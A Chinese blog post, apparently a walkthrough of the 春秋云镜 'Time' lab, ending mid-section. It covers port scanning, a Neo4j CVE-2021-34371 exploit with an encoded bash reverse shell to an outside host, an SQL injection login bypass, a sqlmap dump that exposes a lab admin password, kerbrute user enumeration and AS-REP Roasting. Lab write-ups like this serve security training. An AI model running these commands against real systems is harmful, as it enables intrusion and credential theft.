<!DOCTYPE html>
<html lang="zh-CN">
    
    <head>
    <meta charset="utf-8">
    <meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0,  viewport-fit=cover" name="viewport" />
    <meta name="description" content="春秋云镜Time-wp" />
    <meta name="hexo-theme-A4" content="v1.8.2" />
    <link rel="alternate icon" type="image/webp" href="/img/favicon.webp">
    <title>v2ish1yan</title>

    
        
<link rel="stylesheet" href="/css/a11y-dark.min.css">

        
<link rel="stylesheet" href="/css/reset.css">

        
<link rel="stylesheet" href="/css/markdown.css">

        
<link rel="stylesheet" href="/css/fonts.css">
 
         <!--注意：首页既不是post也不是page-->
        
            
<link rel="stylesheet" href="/css/waline.css">

        
        
        
<link rel="stylesheet" href="/css/ui.css">
 
        
<link rel="stylesheet" href="/css/style.css">


        
            <!--返回顶部css-->
            
<link rel="stylesheet" href="/css/returnToTop.css">

            
<link rel="stylesheet" href="/css/unicons.css">

        
        
            <!--目录-->
            
<link rel="stylesheet" href="/css/toc.css">

        
    
    

<meta name="generator" content="Hexo 6.3.0"></head>
    
    <style>
        :root {
            --waline-theme-color: #000000; 
            --waline-color: #000000; 
            --waline-border-color: #000000; 
            --waline-white: #000000; 
            --waline-bgcolor-light: #ffffff;  
        }
        body {
            color: #000000;
            background: #e4e4e4;
        }
        .post-md code {
            background: #212425;
            color: white; 
        }
        .year-font-color {
            color: #000000 !important;
        }
        .wl-card span.wl-nick {
            color: #000000; 
        }
        .wl-card .wl-badge {
            border: 1px solid #000000;
            color: #000000; 
        }
        .wl-btn {
            border: 1px solid #000000; 
            color:  #000000;  
        }
        .wl-btn.primary {
            color: #ffffff; 
        }
        .wl-header label {
            color: #000000;
        }
        a {
            color: rgb(239, 112, 96);
        }

        .post-md a {
            color: rgb(239, 112, 96);
        }

        .nav li a {
            color: rgb(239, 112, 96);
        }

        .archive-main a:link {
            color: rgb(239, 112, 96);
        }
        .archive-main a:visited {
            color: rgb(239, 112, 96); 
        }

        .archive li span {
            color: #000000;
        }

        .post-main-title {
            color: #000000;
        }

        .post-md h1,
        .post-md h2,
        .post-md h3,
        .post-md h4,
        .post-md h5,
        .post-md h6 {
            color: #000000;
        }

        [data-waline] p {
            color: #000000;
        }
        [data-waline] a {
            color: #000000;
        } 
        .wl-sort li.active {
            color: #000000;
        }

        .wl-card .wl-meta>span {
            background: #ffffff;
        }

        .paper {
            background: #e4e4e4;
        }

        .index-main {
            background: #ffffff;
        }

        .paper-main {
            background: #ffffff;
        }

        .wl-panel {
            background: #ffffff;
        }

        .archive li:nth-child(odd) {
            background: #ffffff;
            ;
        }

        .archive li:nth-child(even) {
            background: #ffffff;
        }

        .post-md>table tr:nth-child(odd) td {
            background: #ffffff;
        }

        .post-md>table tr:nth-child(even) td {
            background: #ffffff;
        }

    
        .progress-wrap::after {
            color: #000000; /* 箭头的颜色 */
        }
        .progress-wrap svg.progress-circle path {
	        stroke: #000000; /* 边框的颜色 */
        }
        .progress-wrap::before {
	        background-image: linear-gradient(298deg, rgb(239, 112, 96), rgb(239, 112, 96)); /* 鼠标滑过的箭头颜色 */
         }

         .left-toc-container::-webkit-scrollbar-thumb {
            background-color: #000000; /* 设置滚动条拖动块的颜色 */
        }

        .bs-docs-sidebar .nav>.active>a,
        .bs-docs-sidebar .nav>li>a:hover,
        .bs-docs-sidebar .nav>li>a:focus {
            color: rgb(239, 112, 96);
            border-left-color: rgb(239, 112, 96);
        }
        .bs-docs-sidebar .nav>li>a {
            color:  #000000;
        }
    </style>

    
    <body>
        
            <div class="left-toc-container">
                <nav id="toc" class="bs-docs-sidebar"></nav>
            </div>
        
        <div class="paper">
            
            
            
            
                <div class="shadow-drop-2-bottom paper-main">
                    
<div class="header">
    <div class="header-container">
        <img style="
        width: 56px;
        height: auto;" alt="^-^" cache-control="max-age=86400" class="header-img" src="/img/favicon.webp" width="10%"></img>
        <div class="header-content">
            <a class="logo" href="/">v2ish1yan</a> 
            <span class="description">一切都是兴趣使然</span> 
        </div>
        
    </div>
    
   
    <ul class="nav">
        
            
                <li><a href="/">首页</a></li>
            
        
            
                <li><a href="/list/">文章</a></li>
            
        
            
                <li><a href="/tags/">标签</a></li>
            
        
            
                <li><a href="/categories/">分类</a></li>
            
        
            
                <li><a href="/about/">关于</a></li>
            
        
            
                <li><a href="/friends/">友链</a></li>
            
        
    </ul>
</div> 
        
                    
                    

                    
                    
                    
                    <!--说明是文章post页面-->
                    
                        <div class="post-main">

    
        <div class="post-main-title">
            春秋云镜Time-wp
        </div>
      
    

    <div class="post-md">
        
            
                <ol class="post-toc"><li class="post-toc-item post-toc-level-1"><a class="post-toc-link" href="#%E5%A4%96%E7%BD%91%E6%8E%A2%E6%B5%8B"><span class="post-toc-text">外网探测</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#%E7%AB%AF%E5%8F%A3%E6%89%AB%E6%8F%8F"><span class="post-toc-text">端口扫描</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#Neo4j-3-4-18-rce"><span class="post-toc-text">Neo4j 3.4.18 rce</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#flag1"><span class="post-toc-text">flag1</span></a></li></ol></li></ol></li><li class="post-toc-item post-toc-level-1"><a class="post-toc-link" href="#%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F"><span class="post-toc-text">内网渗透</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#%E6%89%AB%E6%8F%8F%E4%B8%BB%E6%9C%BA"><span class="post-toc-text">扫描主机</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#sql%E6%B3%A8%E5%85%A5"><span class="post-toc-text">sql注入</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#flag2"><span class="post-toc-text">flag2</span></a></li></ol></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#Kerberos-AS-REP-Roasting%E6%94%BB%E5%87%BB"><span class="post-toc-text">Kerberos AS_REP Roasting攻击</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#%E7%94%A8Bloodhound%E8%BF%9B%E8%A1%8C%E5%9F%9F%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="post-toc-text">用Bloodhound进行域信息收集</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#%E9%80%9A%E8%BF%87%E8%87%AA%E5%8A%A8%E7%99%BB%E5%BD%95%E6%B3%A8%E5%86%8C%E8%A1%A8%E6%9D%A5%E6%8A%93%E5%8F%96%E6%98%8E%E6%96%87%E5%AF%86%E7%A0%81"><span class="post-toc-text">通过自动登录注册表来抓取明文密码</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#DCSync%E6%8A%93%E5%8F%96Hash"><span class="post-toc-text">DCSync抓取Hash</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#Hash%E4%BC%A0%E9%80%92%E8%8E%B7%E5%BE%97%E7%AE%A1%E7%90%86%E5%91%98%E6%9D%83%E9%99%90"><span class="post-toc-text">Hash传递获得管理员权限</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#flag3%E5%92%8Cflag4"><span class="post-toc-text">flag3和flag4</span></a></li></ol></li></ol></li></ol>
            
        
        <h1 id="外网探测"><a href="#外网探测" class="headerlink" title="外网探测"></a>外网探测</h1><h2 id="端口扫描"><a href="#端口扫描" class="headerlink" title="端口扫描"></a>端口扫描</h2><p>使用fscan进行扫描，不知道为什么用nmap扫不了。。。</p>
<pre><code class="bash">./fscan_386 -h 47.92.230.180 -p 1-65535

   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| &#39;__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   &lt;    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.2
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 47.92.230.180   is alive
[*] Icmp alive hosts len is: 1
47.92.230.180:110 open
47.92.230.180:25 open
47.92.230.180:22 open
47.92.230.180:7473 open
47.92.230.180:7474 open
47.92.230.180:7687 open
47.92.230.180:45745 open
[*] alive ports len is: 7
start vulscan
已完成 0/7 [-] webtitle https://47.92.230.180:45745 Get &quot;https://47.92.230.180:45745&quot;: EOF
[*] WebTitle: http://47.92.230.180:7474 code:303 len:0      title:None 跳转url: http://47.92.230.180:7474/browser/
[*] WebTitle: https://47.92.230.180:7687 code:400 len:50     title:None
[*] WebTitle: http://47.92.230.180:7474/browser/ code:200 len:3279   title:Neo4j Browser
[*] WebTitle: https://47.92.230.180:7473 code:303 len:0      title:None 跳转url: https://47.92.230.180:7473/browser/
[*] WebTitle: https://47.92.230.180:7473/browser/ code:200 len:3279   title:Neo4j Browser
</code></pre>
<h2 id="Neo4j-3-4-18-rce"><a href="#Neo4j-3-4-18-rce" class="headerlink" title="Neo4j 3.4.18 rce"></a>Neo4j 3.4.18 rce</h2><p>发现有Neo4j的服务</p>
<blockquote>
<p><a target="_blank" rel="noopener" href="https://baike.baidu.com/item/Neo4j?fromModule=lemma_inlink">Neo4j</a>是一个高性能的,NOSQL图形数据库，它将结构化数据存储在网络上而不是表中。它是一个<a target="_blank" rel="noopener" href="https://baike.baidu.com/item/%E5%B5%8C%E5%85%A5%E5%BC%8F/575465?fromModule=lemma_inlink">嵌入式</a>的、基于<a target="_blank" rel="noopener" href="https://baike.baidu.com/item/%E7%A3%81%E7%9B%98/2842227?fromModule=lemma_inlink">磁盘</a>的、具备完全的事务特性的Java持久化引擎，但是它将结构化数据存储在网络(从数学角度叫做图)上而不是表中。Neo4j也可以被看作是一个高性能的图引擎，该引擎具有成熟数据库的所有特性。程序员工作在一个面向对象的、灵活的网络结构下而不是严格、静态的表中——但是他们可以享受到具备完全的事务特性、企业级的数据库的所有好处。</p>
</blockquote>
<p>然后使用Neo4j的默认密码<code>neo4j/neo4j</code>登录，查看版本，找poc</p>
<p>3.4.18版本</p>
<p><img src="https://typero-1312563978.cos.ap-shanghai.myqcloud.com/typero/202304131516530.png" alt="image-20230413151650410"></p>
<p>刚好找到这个版本有一个rce漏洞<a target="_blank" rel="noopener" href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-34371">CVE-2021-34371</a></p>
<p>poc:<a target="_blank" rel="noopener" href="https://github.com/zwjjustdoit/CVE-2021-34371.jar">CVE-2021-34371.jar</a>，poc需要使用java8来执行</p>
<p>然后使用这个网站来编码命令：<a target="_blank" rel="noopener" href="https://ares-x.com/tools/runtime-exec/">https://ares-x.com/tools/runtime-exec/</a></p>
<pre><code class="bash">java -jar &quot;D:\JAVAWEB\POC\CVE-2021-34371.jar-main\rhino_gadget.jar&quot; rmi://39.98.205.105:1337 &quot;bash -c &#123;echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTxxxxxxxxxxxxxxTk5IDA+JjE=&#125;|&#123;base64,-d&#125;|&#123;bash,-i&#125;&quot;
</code></pre>
<p><img src="https://typero-1312563978.cos.ap-shanghai.myqcloud.com/typero/202304131613503.png" alt="image-20230413161310432"></p>
<p>成功获得反弹shell</p>
<p><img src="https://typero-1312563978.cos.ap-shanghai.myqcloud.com/typero/202304131614825.png" alt="image-20230413161412793"></p>
<h3 id="flag1"><a href="#flag1" class="headerlink" title="flag1"></a>flag1</h3><p>获得flag01: <code>flag&#123;5dfd9a5e-8fac-4ecd-b552-5302e8ab9fa6&#125;</code></p>
<h1 id="内网渗透"><a href="#内网渗透" class="headerlink" title="内网渗透"></a>内网渗透</h1><h2 id="扫描主机"><a href="#扫描主机" class="headerlink" title="扫描主机"></a>扫描主机</h2><p>他提示有Kerberos，先上传个fscan扫一下内网</p>
<p>vps用python开启http服务，然后使用wget下载</p>
<p>得到以下结果</p>
<pre><code class="bash">[*] Icmp alive hosts len is: 4
172.22.6.25:445 open
172.22.6.12:445 open
172.22.6.25:139 open
172.22.6.12:139 open
172.22.6.25:135 open
172.22.6.38:80 open
172.22.6.12:135 open
172.22.6.38:22 open
172.22.6.36:22 open
172.22.6.12:88 open
172.22.6.36:7687 open
[*] alive ports len is: 11
start vulscan
[*] NetInfo:
[*]172.22.6.12
   [-&gt;]DC-PROGAME
   [-&gt;]172.22.6.12
[*] NetInfo:
[*]172.22.6.25
   [-&gt;]WIN2019
   [-&gt;]172.22.6.25
[*] NetBios: 172.22.6.25     XIAORANG\WIN2019               
[*] WebTitle: http://172.22.6.38        code:200 len:1531   title:后台登录
[*] 172.22.6.12  (Windows Server 2016 Datacenter 14393)
[*] NetBios: 172.22.6.12     [+]DC DC-PROGAME.xiaorang.lab       Windows Server 2016 Datacenter 14393 
[*] WebTitle: https://172.22.6.36:7687  code:400 len:50     title:None
</code></pre>
<p>除了本机<code>172.22.6.25</code>，还存在另外几台主机</p>
<ul>
<li>172.22.6.12 域控</li>
<li>172.22.6.38 存在web服务</li>
<li>172.22.6.25 域内主机</li>
</ul>
<p>先查看web服务，使用frp搭建代理，流程省略，在我其他春秋的wp里有</p>
<h2 id="sql注入"><a href="#sql注入" class="headerlink" title="sql注入"></a>sql注入</h2><p>访问web服务</p>
<p><img src="https://typero-1312563978.cos.ap-shanghai.myqcloud.com/typero/202304131622800.png" alt="image-20230413162245711"></p>
<p>应该是个弱密码，抓包爆破一下【如果要抓包，就需要设置全局代理】</p>
<p>没成功，试试sql注入</p>
<p>使用万能密码<code>&#39; or 1=1 #</code>，可以拿到成功的回显</p>
<p><img src="https://typero-1312563978.cos.ap-shanghai.myqcloud.com/typero/202304131636311.png" alt="image-20230413163630231"></p>
<p>但是这里是进不了后台的，所以可能需要盲注，这里就直接跑sqlmap了</p>
<pre><code class="bash">proxychains sqlmap -u http://172.22.6.38/index.php -method=POST --data=&quot;username=1&amp;password=2&quot; -dump
</code></pre>
<p>拿到</p>
<h3 id="flag2"><a href="#flag2" class="headerlink" title="flag2"></a>flag2</h3><ul>
<li><p>flag2：<code>flag&#123;b142f5ce-d9b8-4b73-9012-ad75175ba029&#125; </code></p>
</li>
<li><p>网站的账户密码 administrator&#x2F;bo2y8kAL3HnXUiQo</p>
</li>
<li><p>oa的用户信息</p>
<p><img src="https://typero-1312563978.cos.ap-shanghai.myqcloud.com/typero/202304131647828.png" alt="image-20230413164732786"></p>
</li>
</ul>
<p>但是没有其他可以用的数据，尝试<code>-os-shell</code>拿shel，但是也没有成功，所以应该是没有其他的地方可以打了，看其他主机</p>
<p>仔细回看flag1的提示，可能是考验我们对kerberos的认证过程，先枚举一下域用户</p>
<h2 id="Kerberos-AS-REP-Roasting攻击"><a href="#Kerberos-AS-REP-Roasting攻击" class="headerlink" title="Kerberos AS_REP Roasting攻击"></a>Kerberos AS_REP Roasting攻击</h2><p>将上面数据库中的用户做成字典</p>
<p>使用<a target="_blank" rel="noopener" href="https://github.com/ropnop/kerbrute/releases">Kerbrute</a>，需要上传到第一个主机来执行</p>
<pre><code class="bash">./kerbrute_linux_386 userenum --dc 172.22.6.12 -d xiaorang.lab time.txt
</code></pre>
<p>得到</p>
<pre><code>    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,&lt; /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 04/13/23 - Ronnie Flathers @ropnop

2023/04/13 18:13:03 &gt;  Using KDC(s):
2023/04/13 18:13:03 &gt;   172.22.6.12:88

2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       weixian@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       wengbang@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       xiqidi@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       gaiyong@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       shuzhen@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       yuanchang@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       xuanjiang@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       wenbo@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       lvhui@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       jinqing@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       zhenjun@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       yangju@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       weicheng@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       weixian@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       haobei@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       jizhen@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       jingze@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       rubao@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       tangshun@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       zhaoxiu@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       liangliang@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       qiyue@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       chouqian@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       jicheng@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       xiyi@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       chenghui@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       beijin@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       chebin@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       pengyuan@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       yanglang@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       jihuan@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       duanmuxiao@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       hongzhi@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       gaijin@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       yifu@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       fusong@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       luwan@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       tangrong@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       zhufeng@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       dongcheng@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       lianhuangchen@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       lili@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       rangsibo@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       huabi@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       haoguang@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       wohua@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       wenshao@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       langying@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       diaocai@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       lianggui@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       manxue@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       baqin@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       louyou@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       chengqiu@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       maqun@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       wenbiao@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       chuyuan@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       weishengshan@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       wenliang@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       yulvxue@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       ganjian@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       luyue@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       guohong@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       pangzhen@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       lezhong@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       sheweiyue@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       dujian@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       lidongjin@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       hongqun@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       yexing@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       maoda@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       qiaomei@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       zhangxin@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       ganjian@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       weixian@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       shuzhen@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       wengbang@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       xiqidi@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       yuanchang@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       gaiyong@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       xuanjiang@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       lvhui@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       wenbo@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       zhenjun@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       jinqing@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       yangju@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       weicheng@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       weixian@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       jingze@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       haobei@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       zhaoxiu@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       jizhen@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       rubao@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       liangliang@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       tangshun@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       chouqian@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       qiyue@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       jicheng@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       xiyi@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       beijin@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       chenghui@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       chebin@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       pengyuan@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       yanglang@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       jihuan@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       duanmuxiao@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       hongzhi@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       gaijin@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       fusong@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       yifu@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       luwan@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       tangrong@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       zhufeng@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       dongcheng@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       lili@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       lianhuangchen@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       huabi@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       rangsibo@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       wohua@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       haoguang@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       wenshao@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       langying@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       diaocai@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       lianggui@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       manxue@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       baqin@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       weishengshan@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       wenbiao@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       louyou@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       maqun@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       chuyuan@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       wenliang@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       chengqiu@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       yulvxue@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       ganjian@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       luyue@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       guohong@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       dujian@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       pangzhen@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       sheweiyue@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       lezhong@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       hongqun@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       lidongjin@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       yexing@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       qiaomei@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       maoda@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       zhangxin@xiaorang.lab
2023/04/13 18:13:03 &gt;  [+] VALID USERNAME:       ganjian@xiaorang.lab
</code></pre>
<p>然后进行AS_REP Roasting攻击</p>
<blockquote>
<p>AS_REP Roasting是一种对用户账户进行离线爆破的方式</p>
<p>需要关闭预身份验证，而此选项又是默认开启的，所以有一定的限制</p>
<p>默认开启的预身份验证是会记录密码错误次数来防止爆破的</p>
<p>关闭预身份验证后，在进行AS_REQ之后的时候，KDC不会进行任何验证就将TGT和用该用户Hash加密的Login Session Key返回</p>
<p>由于AS_REP的数据包中Login Session Key的是由用户Hash进行加密的</p>
<p>因此，可以对获取到的用户Hash加密的Login Session Key进行离线爆破，得到对应用户的明文密码</p>
</blockquote>
<p>因为当前主机不在域内，所以使用<a target="_blank" rel="noopener" href="https://github.com/fortra/impacket">impacket</a>的GetNPUsers.py进行攻击</p>
<p>将刚才获得的用户放进字典</p>
